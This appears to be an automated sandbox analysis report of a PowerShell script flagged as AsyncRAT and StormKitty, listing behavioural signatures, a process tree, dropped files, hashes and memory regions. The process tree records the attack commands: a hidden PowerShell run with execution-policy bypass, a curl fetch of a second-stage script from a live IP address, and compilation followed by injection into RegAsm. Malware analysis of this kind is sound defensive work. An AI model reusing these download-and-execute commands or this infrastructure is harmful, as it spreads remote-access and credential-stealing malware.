Analysis

  • max time kernel
    94s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-01-2025 09:13

General

  • Target

    trwsfg.ps1

  • Size

    1KB

  • MD5

    87cb99ee4cbf9c8c190da786ff51cc5e

  • SHA1

    70fcc5113233216e878781682befcedddf85eda2

  • SHA256

    81c941402a1bcf018d8d965f700229b5815d03ba02ca9f2d1a22c8ace0476972

  • SHA512

    85200ea2189e6e860286b9d0637698a9cf6c03380030816202e3ed0554da39bf01300470a0345f7c05b297e04e4603c2f226618fae9422d833ba22b5a47bfe6d

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Drops startup file 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trwsfg.ps1
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Drops startup file
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1284
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4712
      • C:\Windows\system32\cmd.exe
        cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4024
        • C:\Windows\system32\curl.exe
          curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
          4⤵
            PID:1360
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4796
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jmqljpd1\jmqljpd1.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1444
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB333.tmp" "c:\Users\Admin\AppData\Local\Temp\jmqljpd1\CSC4EF0F37AA2AD4D88A93264BDD4437E9.TMP"
              5⤵
                PID:4656
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              4⤵
                PID:1488
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:1016

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          556084f2c6d459c116a69d6fedcc4105

          SHA1

          633e89b9a1e77942d822d14de6708430a3944dbc

          SHA256

          88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

          SHA512

          0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

        • C:\Users\Admin\AppData\Local\Temp\RESB333.tmp

          Filesize

          1KB

          MD5

          e8bc6a8cd132e7d9b944a9f549d25627

          SHA1

          e178ce1dd7d75e06646df19bc2f823bc471b5119

          SHA256

          306345fd4a452c51908f5160b062a2b8a5aeeaae670bef42319286ee0d70d923

          SHA512

          f6ef1e172a2011cf8c82034d75ca4eeabc3de26a7a15ddd19eec4a715a70a542de842fd790b0ce40aa83327805ca7955d52eb2d0870793a2b6f0c78f76ece2e0

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1ye2fza2.zah.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\jmqljpd1\jmqljpd1.dll

          Filesize

          9KB

          MD5

          9d0626db0a70797d4ee9bd266a471a28

          SHA1

          e4d1745a045933fc0c2813a17ada200eb1909288

          SHA256

          bef2c4499ef2bd121548e6569feeec38f4c5b719ee35de1dc84e4338b06536f2

          SHA512

          0f936717eed55db4cd25e6f6717f57d1bb2948fabf31ac8c41f805bcc8725ac25ad9b10be9ad73602239e64b6bbe781b664b9b9f3ad4ad7c4c01e5f4f295c0c7

        • C:\Windows\Temp\Modules.bat

          Filesize

          3KB

          MD5

          bb445d197063475c8d78de4f0825753c

          SHA1

          158a8e3b278affe7c1185aad67683e4253cf53dd

          SHA256

          7066e4a496d83ee1b677ade06c868a432bb4a0dd364b19ee184147a527b11c10

          SHA512

          173cd8a56e2fa6e8db33bc13870f8751473251aa80be2235321e62b0f84961e9fd00a236aec63342d73f262dbc7c2a920951a1a8f41707ca6640e673f21c4307

        • \??\c:\Users\Admin\AppData\Local\Temp\jmqljpd1\CSC4EF0F37AA2AD4D88A93264BDD4437E9.TMP

          Filesize

          652B

          MD5

          11f47bf9382a5e8cd0c3027a834fbbb8

          SHA1

          a0f7a63169075a8f8dfa4e5ae0073c868e86b7b9

          SHA256

          f49111c442e89f58de7dbd6cc3a4b3f7171d16bc28602b5bf82f0a4f9449ec39

          SHA512

          a2b9bb07668f148a0b08408663a29998c9f142b8fc2720c31f99af3558751d86a16d9fc06cf61301a3f86f19fefbfcb5b6ecf934a3740564c1e5464cd647c4fa

        • \??\c:\Users\Admin\AppData\Local\Temp\jmqljpd1\jmqljpd1.0.cs

          Filesize

          10KB

          MD5

          b5c3a2d03ff4c721192716f326c77dea

          SHA1

          6b754fd988ca58865674b711aba76d3c6b2c5693

          SHA256

          ab42fe5fd08cb87663e130f99f96124fdd37d825d081b9712b0bad8b6f270fac

          SHA512

          d32e5a98c12b6b85d1913555ea54f837cd0fc647ca945aef9d75ffade06506be1f4a2348827f11c4eeae0796e4156c8f352e3c0f9a6e2cdc93cb501bcdf2c248

        • \??\c:\Users\Admin\AppData\Local\Temp\jmqljpd1\jmqljpd1.cmdline

          Filesize

          204B

          MD5

          4e49a27891197e806f0dbcee6daee424

          SHA1

          d49eb28ec20efdf2f4adce37d8ed3871a6e9c633

          SHA256

          6d8031df00a944af3437f6225bfc3b6e255967c02d2339393965042b11908195

          SHA512

          e30d7c4166e81f0410459b7def085586541e21ea5adbdd92ecc4596afd18745a3a0dcf43536abb3e56314bf611d3430549d0c984fa876f116e611000934db844

        • memory/1016-49-0x0000000000400000-0x0000000000704000-memory.dmp

          Filesize

          3.0MB

        • memory/1016-60-0x0000000006B20000-0x0000000006E74000-memory.dmp

          Filesize

          3.3MB

        • memory/1016-59-0x0000000006AF0000-0x0000000006B12000-memory.dmp

          Filesize

          136KB

        • memory/1016-58-0x0000000006640000-0x00000000066A6000-memory.dmp

          Filesize

          408KB

        • memory/1016-57-0x00000000065A0000-0x000000000663C000-memory.dmp

          Filesize

          624KB

        • memory/1016-54-0x0000000005410000-0x000000000541A000-memory.dmp

          Filesize

          40KB

        • memory/1016-53-0x0000000005D20000-0x0000000005DB2000-memory.dmp

          Filesize

          584KB

        • memory/1016-52-0x0000000005770000-0x0000000005D14000-memory.dmp

          Filesize

          5.6MB

        • memory/1284-1-0x0000020F7D9A0000-0x0000020F7D9C2000-memory.dmp

          Filesize

          136KB

        • memory/1284-11-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

        • memory/1284-12-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

        • memory/1284-18-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

        • memory/1284-0-0x00007FF81EA33000-0x00007FF81EA35000-memory.dmp

          Filesize

          8KB

        • memory/4796-20-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

        • memory/4796-47-0x00000256E2E00000-0x00000256E2E08000-memory.dmp

          Filesize

          32KB

        • memory/4796-51-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

        • memory/4796-34-0x00000256E2DF0000-0x00000256E2E00000-memory.dmp

          Filesize

          64KB

        • memory/4796-33-0x00000256E5400000-0x00000256E5476000-memory.dmp

          Filesize

          472KB

        • memory/4796-32-0x00000256E5330000-0x00000256E5374000-memory.dmp

          Filesize

          272KB

        • memory/4796-22-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

        • memory/4796-21-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB